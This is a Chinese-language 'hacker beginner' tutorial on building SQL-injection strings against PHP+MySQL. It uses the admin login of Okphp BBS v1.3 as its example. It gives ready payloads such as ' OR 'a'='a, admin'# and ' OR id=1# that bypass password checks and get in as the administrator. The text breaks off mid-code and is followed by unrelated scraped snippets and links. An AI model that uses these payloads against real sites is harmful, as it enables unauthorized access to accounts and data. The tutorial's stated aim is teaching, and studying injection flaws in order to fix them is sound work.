php+mysql注射语句构造技术
黑客入门技术之php+mysql注射语句构造:
一.前言:
测试版本信息:Okphp BBS v1.3 开源版
由于PHP和MYSQL本身得原因,PHP+MYSQL的注射要比asp困难,尤其是注射时语句的构造方面更是个难点,本文主要是借对Okphp BBS v1.3一些文件得简单分析,来谈谈php+mysql注射语句构造方式,希望本文对你有点帮助。
声明:文章所有提到的"漏洞",都没有经过测试,可能根本不存在,其实有没有漏洞并不重要,重要的是分析思路和语句构造。
二."漏洞"分析:
1.admin/login.php注射导致绕过身份验证漏洞:
代码:
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username='$username' and password='$password'"中
$username 和 $password 没过滤, 很容易就绕过。
对于select * from $user_table where username='$username' and password='$password'这样的语句改造的方法有:
构造1(利用逻辑运算):$username=' OR 'a'='a $password=' OR 'a'='a
相当于sql语句:
select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'
构造2(利用mysql里的注释语句# ,/* 把$password注释掉):$username=admin'#(或admin'/*)
即:
select * from $user_table where username='admin'#' and password='$password'"
相当于:
select * from $user_table where username='admin'
在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2:
select id,group_id from $user_table where username='admin'#' and password='$password'"
相当于:
select id,group_id from $user_table where username='admin'
只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id,
我们就可以这样构造:$username=' OR id=1#
相当于:
select id,group_id from $user_table where username='' OR id=1# and password='$password'(#后的被注释掉)
我们接着往下看代码:
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($
相关文档:
import java.io.File;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import jxl.*;
public class ImportExcel {
public static void main(String[] args) {
File importExcel = new File("D:\\test\\test.xls");
try {
// 数据库连接
Class.forNa ......
http://topic.csdn.net/t/20040927/15/3412922.html
http://www.docin.com/p-23414672.html
http://www.qqread.com/php/n652282101.html
http://www.51testing.com/?uid-65519-action-viewspace-itemid-142987
1 apache配置文件httpd.conf最後添加:
LoadModule php6_module "c:/php6/php6apac ......
have been studying parsing JSON from PHP using AJAX to display it in
the client side and jQuery had been a great help to me. Here is a very
simple code in parsing JSON using jQuery that i made.
tablejsondata.php
This file makes the request to a php file and displays the returned data into a tabl ......
Beginning Php And Mysql程序设计
Beginning PHP and MySQL from Novice to Professional 3rd Edition
Head First PHP MySQL
The Essential Guide to DreamweaverCS3 with CSS Ajax and PHP
php手册
......
